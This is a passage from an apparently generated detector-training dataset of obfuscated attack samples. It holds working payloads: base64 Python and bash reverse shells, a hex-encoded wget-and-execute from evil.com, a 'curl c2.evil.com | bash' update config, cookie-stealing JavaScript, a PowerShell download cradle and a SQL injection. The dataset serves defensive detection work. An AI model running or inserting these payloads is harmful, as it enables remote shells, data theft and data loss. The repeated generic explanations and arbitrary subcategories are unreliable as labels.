"malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00470", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00471", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00472", "source": "hard_negatives", "source_license": "generated", "text": "[2023-07-17 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00473", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.88aebbed.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00474", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00475", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00476", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00477", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.0cd117d0.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00478", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.ec34c113.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00479", "source": "hard_negatives", "source_license": "generated", "text": "var _0x88f0=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0xa51b[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00480", "source": "hard_negatives", "source_license": "generated", "text": "var _0xa458=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x11a2[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00481", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.9a55cc26.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00482", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00483", "source": "hard_negatives", "source_license": "generated", "text": "var _0x23d7=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x523c[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00484", "source": "hard_negatives", "source_license": "generated", "text": "var _0x8bad=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x8646[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00485", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00486", "source": "hard_negatives", "source_license": "generated", "text": "var _0x1582=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0xc4b9[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00487", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00488", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00489", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00490", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00491", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.732fc30c.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00492", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00493", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00494", "source": "hard_negatives", "source_license": "generated", "text": "var _0x0c7b=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x9837[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00495", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00496", "source": "hard_negatives", "source_license": "generated", "text": "var _0xdc76=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x6566[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00497", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00498", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00499", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]}